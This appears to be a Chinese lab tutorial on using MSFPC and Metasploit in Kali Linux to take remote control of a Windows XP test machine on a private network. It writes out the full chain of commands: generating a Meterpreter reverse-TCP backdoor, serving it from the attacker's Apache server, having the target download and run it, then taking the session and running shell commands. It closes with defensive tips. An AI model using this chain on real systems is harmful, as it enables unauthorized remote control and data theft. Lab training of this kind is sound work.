目录
步骤二:把被控端放到kali的网站主目录下,启动apache2,到靶机下载被控端并运行。
一、简介
远程控制是指通过网络连接到另一台计算机,并在远程执行操作的过程。在网络安全领域,远程控制通常用于渗透测试、远程管理和监控等目的。
在kali linux中提供了一个名为MSFPC(全称为MSFvenom Payload Creator)的工具,它是MSFvenom的优化版,是一个基于用户选择生成多种类型有效载荷的包装器。这个想法是尽可能简单(只需要一个输入)来产生他们的有效载荷。完全自动化msfvenom&Metasploit是最终目标 (以及能够自动化MSFPC本身)。剩下的就是让用户的生活尽可能简单(如IP选择菜单,msfconsole资源文件/命令,批量有效载荷生成,并能够以任意顺序(以各种格式/模式)输入任何参数 )。来自用户的唯一必要的输入应该是定义平台(例如 windows)所需的有效载荷,或者他们希望有效载荷具有的文件扩展名(例如 exe)。
本次实验我们将使用MSFPC生成windows下的被控端,并使用metasploit渗透工具进行远程控制。
测试windows系统实验使用的网络环境:
测试用windows系统(WinXPenSP)的IP: 192.168.107.133
虚拟机Kali Linux 2的IP: 192.168.107.129
二、实验过程
步骤一:生成Windows操作系统下的被控端
/usr/bin/msfpc windows
输入命令生成被控端,选择本机IP
步骤二:把被控端放到kali的网站主目录下,启动apache2,到靶机下载被控端并运行。
1、把被控端放到kali的网站主目录下
cp windows-meterpreter-staged-reverse-tcp-443.exe /var/www/html/
将被控端复制到apache2网站目录下
2、启动apache2
检查apache2服务是否启动
systemctl start apache2
systemctl status apache2
3、到目标靶机(WinXPenSP3)下载被控端并运行
(1)给被控端改一个好记的名字。
mv /var/www/html/windows-meterpreter-staged-reverse-tcp.exe /var/www/html/windows.exe
(2)在目标靶机下载被控端
在xp靶机中打开ie浏览器,输入kali的ip地址和被控端的名字进行下载
http://192.168.107.129/windows.exe
(3)运行被控端
步骤三:在kali中运行主控端
配置对应的主控端
使用metasploit配置远程控制主控端
msfconsole -q -r '/home/kali/windows-meterpreter-staged-reverse-tcp-443-exe.rc'
步骤四:控制目标靶机一(WinXPenSP3)
1、查看会话,并选择会话。
输入sessions查看和选择会话
成功控制xp靶机
2、列出当前目录下的所有文件等。
3、打开cmd执行各种命令,如查看文件夹内容、操作系统信息、关机。
Shell
设置60秒后关机,并弹出提示信息“hello!”。
三、实验总结
通过Kali Linux进行远程控制实验,可以帮助安全从业人员熟悉渗透测试工具的使用,加深对网络安全的理解。同时,也能够帮助提升应对网络攻击和安全事件的能力,为加强系统安全提供有力支持。
MSFPC的出现,实现了自动化的载荷生成和远程控制,如果需要生成其他类型的Shell,只需替换linux、apk、php等参数即可,但MSFPC对比MSFvonom也有优缺点
优点:快捷便利:MSFPC提供了简单易用的命令行工具,适合快速生成Shell。
适合懒人:通过MSFPC,无需繁琐的配置,非常适合懒惰的用户。
缺点:功能相对较弱:与MSFvenom相比,MSFPC的功能相对有限,适合一些基本的Shell生成需求。
在日常生活中,为了防止不法分子远程控制我们的计算机,窃取重要资料,我们应该做到以下几点:
1.安装杀毒软件,定期更新杀毒软件,确保其能够识别最新的病毒。
2.更新操作系统和应用程序,及时安装操作系统和应用程序的安全补丁,以修复已知的漏洞。
3.谨慎打开附件,不要随意打开来自未知发件人的邮件附件,避免下载不明文件。
4.使用防火墙,配置防火墙来监控网络流量,阻止恶意软件的入侵。
5.定期备份数据,定期备份重要数据,以防止数据丢失或被勒索软件加密。
6.注意网络安全,避免使用不安全的公共Wi-Fi网络,保护个人信息和数据安全。